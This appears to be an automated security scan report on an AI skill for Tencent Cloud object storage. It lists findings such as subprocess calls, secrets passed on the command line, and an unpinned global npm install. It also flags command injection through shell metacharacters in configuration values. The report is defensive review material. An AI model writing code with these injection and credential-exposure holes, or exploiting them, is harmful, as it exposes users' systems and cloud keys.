Trust Assessment
tencentcloud-cos-skill received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 14 findings: 5 critical, 6 high, 2 medium, and 1 low severity. Key findings include Arbitrary command execution, Dangerous call: subprocess.Popen(), Dangerous call: subprocess.run().
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings14
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/scripts/cos_wrapper.py:109 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:62 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:73 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:253 | |
| CRITICAL | Credentials exposed in command-line arguments The `scripts/cos_wrapper.py` script constructs a command to execute `npx cos-mcp` and passes sensitive credentials (`TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY`) directly as command-line arguments. These arguments are visible to other processes on the system (e.g., via `ps aux`), can be logged by system monitoring tools, and may be stored in shell history, leading to credential exposure. Avoid passing sensitive credentials directly as command-line arguments. Instead, use environment variables, secure configuration files with restricted permissions, or a secure credential management system. If `cos-mcp` supports reading credentials from stdin or a temporary file, that would be a more secure approach. | LLM | scripts/cos_wrapper.py:90 | |
| HIGH | Dangerous call: subprocess.Popen() Call to 'subprocess.Popen()' detected in function 'start_mcp_server'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/scripts/cos_wrapper.py:109 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'check_dependencies'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:62 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'check_dependencies'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:73 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'run_example'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:253 | |
| HIGH | Potential command injection via unescaped configuration values The `scripts/cos_wrapper.py` script constructs a shell command using f-strings to embed configuration values (e.g., `Region`, `Bucket`, `SecretId`, `SecretKey`, `DatasetName`) directly into the command executed by `subprocess.Popen`. If an attacker can control or influence these configuration values, they could inject shell metacharacters (e.g., `;`, `&`, `|`, `$()`, `` ` ``) to execute arbitrary commands on the host system. Ensure all user-controlled or untrusted input used in shell commands is properly escaped. For `subprocess.Popen`, it is generally safer to pass a list of arguments directly (e.g., `['npx', 'cos-mcp', '--Region', self.config['Region'], ...]`) rather than a single string, and avoid `shell=True`. If string formatting is necessary, use a robust escaping mechanism for shell arguments. | LLM | scripts/cos_wrapper.py:88 | |
| HIGH | Unpinned dependency with global installation The skill's `install.sh` script and manifest specify `npm install -g cos-mcp@latest`. Installing a package globally using `@latest` without pinning a specific version introduces a significant supply chain risk. If the `cos-mcp` package maintainer's account or repository is compromised, a malicious update could be pushed, leading to arbitrary code execution on systems where this skill is installed. The `cos-mcp` package is then executed with sensitive credentials. Pin the `cos-mcp` dependency to a specific, known-good version (e.g., `npm install -g cos-mcp@1.2.3`). Regularly review and update the pinned version after verifying its integrity and security. Consider using a package lock file or a private registry to further mitigate risks. | LLM | install.sh:90 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/shawnminh/tencentcloud-cos/install.sh:153 | |
| MEDIUM | Credential placeholders in configuration templates The `install.sh` and `package_skill.sh` scripts generate `clawdbot_config.json` and `env.template` files that include placeholder values for `TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY` directly in the JSON/text. While these are templates, they encourage users to store sensitive credentials in plain text within configuration files, which can be easily exposed if the files are committed to version control, shared, or stored on an insecure system. Modify the templates to clearly indicate that credentials should be loaded from environment variables or a secure secret management system, rather than being directly inserted into the file. For example, use `"TENCENT_COS_SECRET_ID": "${TENCENT_COS_SECRET_ID}"` or simply omit the placeholder values and provide instructions for setting them securely. | LLM | install.sh:150 | |
| LOW | Skill requires broad cloud credentials The skill requires `TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY`, which are typically highly privileged credentials for Tencent Cloud COS. The skill then performs a wide range of operations including file management, image processing, and search. While the skill itself doesn't define the permissions, it implicitly encourages the use of credentials with broad access, potentially violating the principle of least privilege. Recommend users to create dedicated IAM sub-accounts with the absolute minimum necessary permissions for the skill's operations. Provide clear documentation on the specific COS and CI permissions required, rather than relying on full access keys. | LLM | SKILL.md:1 |
Scan History
Embed Code
[](https://skillshield.io/report/bcee064a21a45413)
Powered by SkillShield